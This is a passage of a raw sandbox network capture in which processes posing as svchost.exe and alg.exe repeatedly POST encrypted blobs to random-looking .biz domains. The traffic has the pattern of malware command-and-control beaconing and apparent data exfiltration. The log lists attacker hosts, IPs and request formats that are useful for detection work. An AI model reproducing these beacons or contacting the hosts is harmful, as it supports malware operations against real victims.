                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: GuK\(m42.%XvXT&`}GcD:eFOE[SUY0VpoL"uQ/*oW'K+h5 )RHx1/(uvHffab>EEnWzjW1O{RZDmQhh;
Oct 8, 2024 15:29:17.006650925 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=2208f7eea2544e1859d5c4a602c5dfc2|8.46.123.33|1728394156|1728394156|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.2.4 | 50090 | 47.129.31.212 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:16.290257931 CEST | 353 | OUT | POST /rjfjacxyvik HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:29:16.290714979 CEST | 786 | OUT | Data Raw: 46 cd 68 b5 61 d8 70 5d 06 03 00 00 8b ac f8 a8 ad b5 a7 96 a5 a7 c5 96 a0 ba 85 eb d3 86 3e be 2d 69 4b 96 6e 60 59 ea d4 c0 2d b6 72 44 ab aa 50 2b 4b b1 bf 4d 41 c6 3b a3 dc bf 78 fc 3b 09 92 41 e6 7c fa 57 6d 4b d5 f2 71 38 10 f5 be 8e f9 56
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Fhap]>-iKn`Y-rDP+KMA;x;A|WmKq8V!_B?vS?:@8"`rDq6{H1iuViWyR}z/"pMLk%Hjl);Yq9zB!4R& ?~ m=MgWwY>
Oct 8, 2024 15:29:17.632180929 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=229c5cc832d6b2ae98aeb33148c2ea7f|8.46.123.33|1728394157|1728394157|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.4 | 50102 | 34.211.97.45 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:17.397072077 CEST | 356 | OUT | POST /snachosinlefnrw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:29:17.397072077 CEST | 778 | OUT | Data Raw: f9 a2 9e 74 86 c1 2c 43 fe 02 00 00 b5 fe 98 e9 bf 24 be 87 11 3e 18 05 d0 60 f9 38 69 30 be ce d4 5a db cc 42 39 d7 29 e8 fd e6 9e 68 ec 49 b5 5a 0e ce 71 b5 2f 3c be 72 41 05 8b ba 62 20 ce 88 82 7b 90 85 93 43 93 b8 ad 60 f8 5c 50 38 f2 3b 8a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: t,C$>`8i0ZB9)hIZq/<rAb {C`\P8;[`SYn":\:#O-#%H ?n^u*B*6$@K[&MbW&lPAM4HAvbf)"SJ|~=`ca :x543#\vE
Oct 8, 2024 15:29:18.130628109 CEST | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:18 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7b363435a0086bb795047a01b4b18bb5|8.46.123.33|1728394158|1728394158|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.4 | 50103 | 18.208.156.248 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:17.763788939 CEST | 353 | OUT | POST /rokvfxqf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: opowhhece.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:29:17.763806105 CEST | 786 | OUT | Data Raw: 5a 91 8b ae 42 fe 14 e1 06 03 00 00 54 1f 31 68 86 06 66 71 01 8e 14 5e e8 d0 e1 a9 7c 84 a1 74 f2 8b b6 f2 7f 79 be ac 05 4f 7b d8 a4 9a a5 f8 75 4e 91 10 b3 b1 fa e2 a4 c4 e5 2d ba d2 8b c3 8e 95 3c 5e a3 76 04 55 15 b5 8c f6 9b 2a 65 be 5d bf
Data Ascii: ZBT1hfq^|tyO{uN-<^vU*e]]KyK]ATK XpB,Toe1u~{Sr|i~)*A|ywr%Q~tyMyW]Zr~OQ0?eOu$&$sTczLWlt
Oct 8, 2024 15:29:18.227437019 CEST | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:18 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b6588295e57609693491c7c6151c19af|8.46.123.33|1728394158|1728394158|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.4 | 50108 | 13.251.16.150 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:18.281915903 CEST | 345 | OUT | POST /fkc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jdhhbs.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:29:18.281943083 CEST | 786 | OUT | Data Raw: 4b 02 cc 10 0e a4 60 26 06 03 00 00 3c 2c 07 e8 21 f6 9a b7 ff 30 6b 01 9d 35 9d e0 7d 36 85 5c 0a fa 62 ed 7e 90 4d 13 ed 57 e6 5f af b8 1b 1a 78 00 d0 52 fa ba 7e 12 e9 bc 94 7a d7 72 78 83 41 cb c9 64 55 7e 8d f5 38 25 69 9a 85 4b 21 f5 c6 00
Data Ascii: K`&<,!0k5}6\b~MW_xR~zrxAdU~8%iK!?ug\?m6PR_vCG-Y2xc="?,a^,Z8["])#N`{N)PsaBXMM:5+Az\99pdq,wYGy>N
Oct 8, 2024 15:29:19.610471964 CEST | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=051f693a0caf73c54d07d2b2a9fd7c25|8.46.123.33|1728394159|1728394159|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.4 | 50109 | 3.94.10.34 | 80 | 2912 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:18.403551102 CEST | 361 | OUT | POST /rkgoodhecptjykcl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gvijgjwkh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 8, 2024 15:29:18.403551102 CEST | 778 | OUT | Data Raw: 1d a1 c1 8e 0b 95 ea 41 fe 02 00 00 fa 4f 36 4d c6 d7 fa b6 c9 b7 1a 72 c9 f6 4d eb 84 2a 25 a0 8e 9a 84 7e 83 13 f1 e9 2e d2 83 92 46 0d 51 1d 8c 58 e4 4e 02 ed ac 93 d3 12 f8 84 46 58 78 ae 4f 36 06 3b 7d 79 8f d2 25 9c 33 88 e8 90 f9 b2 88 98
Data Ascii: AO6MrM*%~.FQXNFXxO6;}y%3="?KSUBA)I`j}=e^_D>1Yz*[bd.8D,c-GT{Y]Hy5f$*>p|]8$O#u-0w~^ZP0`;935>@CD
Oct 8, 2024 15:29:18.868707895 CEST | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:18 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=767237ddb57289a85c40edda7bba0f5c|8.46.123.33|1728394158|1728394158|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.4 | 50116 | 44.213.104.86 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:19.250225067 CEST | 351 | OUT | POST /kitlgdtf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:29:19.250256062 CEST | 778 | OUT | Data Raw: 92 bf 4c 15 5f c0 4e 46 fe 02 00 00 d3 95 58 93 09 92 7e c3 f6 e3 f7 52 dc 07 84 c9 ff 8b 9e e4 d4 a0 36 c1 d8 8f 75 05 ab 08 65 19 ae a2 a6 16 f7 9a b0 e8 af 50 48 f2 9a 64 a1 d1 b0 b6 8c 4c 9f 67 f0 f2 36 de e4 93 7a 23 4e 4d f0 db 32 65 d7 2e
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: L_NFX~R6uePHdLg6z#NM2e.1!QCSe*cpR&wztolcB*r|,c%!sa&2Jkq{G9aV}LFEY)Ny&7VkhnTZekF=hf1
Oct 8, 2024 15:29:19.738152981 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=1707d83a834d091240ed4d217696b091|8.46.123.33|1728394159|1728394159|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.4 | 50121 | 34.246.200.160 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:19.725816965 CEST | 356 | OUT | POST /gpuqtdsdsmc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:29:19.725835085 CEST | 786 | OUT | Data Raw: 32 f1 93 7f f0 ec 3d f0 06 03 00 00 0f ac e8 09 98 29 07 ca 51 ec 59 4e f4 4a af 93 4b ff 58 f0 2b ab 20 cd 1b b5 6b 39 a5 04 57 55 c7 37 5c 72 f4 0e 1a 85 ee fb 32 5a ef 7f c1 a6 6c 04 1f f2 6a 06 17 84 9e d3 bb 6d 98 2b 88 fe 2f 2c a1 8e c0 45
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 2=)QYNJKX+ k9WU7\r2Zljm+/,E7c/\(z_GP`"d|KxVd4PD`F4.HJ{|;b\/|gDfTs="7@rML)v) .3`d8P}#3#f
Oct 8, 2024 15:29:20.468688011 CEST | 411 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=d1bd110ecff911d2a42f1eab0671a014|8.46.123.33|1728394160|1728394160|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.4 | 50123 | 3.254.94.185 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:20.090920925 CEST | 350 | OUT | POST /ieicusmwh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:29:20.090920925 CEST | 778 | OUT | Data Raw: 6a 8b 4f bc b8 a8 1c 28 fe 02 00 00 05 45 e9 83 3f 0f d9 ca bd 2a b5 b7 ee e4 a7 03 6e c6 4d 71 01 98 a6 da 3e 35 33 ab c7 6d f9 8e 16 63 b1 1a 27 16 58 0b bd c9 3d 77 d9 93 0a e3 fc 17 01 08 72 48 b8 cf 90 5a aa 27 e7 12 85 7c 95 82 5f df 41 5e
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: jO(E?*nMq>53mc'X=wrHZ'|_A^#lV&~w29PBG9|_8iKM8B;?M|z<+I%Eh&M@_h>I(vFR '\3YYK\j}:sKB
Oct 8, 2024 15:29:20.907075882 CEST | 407 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4260625539565a326d20e772d429f612|8.46.123.33|1728394160|1728394160|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
100 | 192.168.2.4 | 50128 | 18.141.10.107 | 80

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:20.490500927 CEST | 351 | OUT | POST /hhgppons HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: warkcdu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:29:20.490767956 CEST | 786 | OUT | Data Raw: f0 29 90 96 85 a6 a9 db 06 03 00 00 6b 9c f1 ab 61 11 32 4f 1d 85 ba 2b cd 09 a6 3e d4 20 67 06 30 89 5f 55 03 a3 5d e1 28 2b 0b 3f 6d b6 92 dd d3 e3 70 cb 4c 9f 7f ab 5a f1 fb 83 0d f7 94 e7 9f 6c b7 4c 0d 02 96 91 3a b1 8e 6f e6 88 ad 21 42 a1
Data Ascii: )ka2O+> g0_U](+?mpLZlL:o!Bk#$2XRP%+s7Jx+Zc\n)yJ{7{Ov G-"IuA3TI1#536%UdxM!Zin6.[[:@
Oct 8, 2024 15:29:21.827528954 CEST | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c1436184f12f519c68235764ee3526c4|8.46.123.33|1728394161|1728394161|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
101 | 192.168.2.4 | 50132 | 85.214.228.140 | 80

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:21.218652010 CEST | 358 | OUT | POST /lcarfqhjjqwitg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dlynankz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 8, 2024 15:29:21.218652010 CEST | 778 | OUT | Data Raw: 0f 27 55 97 e0 86 00 82 fe 02 00 00 b3 8e 0a 64 b8 65 06 95 a5 71 d5 b1 35 6c c1 dc da 10 bc 5e c4 8d 38 6f ee 5d 7d e6 d6 25 66 7a 12 72 6c 17 ad bc 22 6e db 65 d1 2e 21 b4 9b 6a 76 86 d7 3e 07 75 5a 2b c2 83 df 11 49 f9 3d f8 34 58 2f d3 73 05
Data Ascii: 'Udeq5l^8o]}%fzrl"ne.!jv>uZ+I=4X/s##f,^%4bHQ4\ :m.q]fz fMlplzxRwmCS'_Qb(e14^v,`b~}~t}97`V SN
Oct 8, 2024 15:29:21.848566055 CEST | 166 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.27.2
Date: Tue, 08 Oct 2024 13:29:21 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.4 | 50137 | 13.251.16.150 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:21.857755899 CEST | 350 | OUT | POST /gvodnknqs HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gcedd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:29:21.857755899 CEST | 786 | OUT | Data Raw: 7f 7e 30 fa 2c 51 64 93 06 03 00 00 ac b0 41 ec 8e 84 8b ee 3d 2e c7 3f 99 23 6c ef a2 36 d1 d5 98 74 98 6a 77 22 ff 2c 60 97 69 9c ba 1c 3b e0 06 18 14 30 8e 1c 48 df 8f 2f 94 b1 d4 81 35 96 9e cd 4d 8c 42 bc b2 b2 9f 57 97 7a f8 37 e0 b0 1c 53
Data Ascii: ~0,QdA=.?#l6tjw",`i;0H/5MBWz7Sx0tI>+fUJ`n;#,>^ThMK5,1SS3!3,>##7\jXuoJee2g5dsN.H0%Y+k+%ey1O}D
Oct 8, 2024 15:29:23.227308989 CEST | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=92d14cd408b77ae3fc077b8ac30783b3|8.46.123.33|1728394162|1728394162|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.4 | 50139 | 47.129.31.212 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:22.050046921 CEST | 351 | OUT | POST /vvlfkuqn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:29:22.050070047 CEST | 778 | OUT | Data Raw: 1b b9 db 33 e3 da 55 6f fe 02 00 00 61 8d 87 79 1b af c6 c2 36 48 e2 e6 9f c4 f9 9f 59 47 e3 f2 41 1c 60 f2 92 f9 c7 46 e0 56 c1 c9 07 1b 4f e3 10 8f b1 8c c9 16 74 ca b8 ea 23 44 9c 9c 10 83 c5 63 b1 b4 1d 80 41 9c c0 77 2f fa 58 ac 27 ab 78 e9
Oct 8, 2024 15:29:23.370683908 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=bc3ffbf1132f3aa8e54d978a1ff6cf10|8.46.123.33|1728394163|1728394163|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
104 | 192.168.2.4 | 50140 | 18.208.156.248 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:23.259179115 CEST | 350 | OUT | POST /ulhoa HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
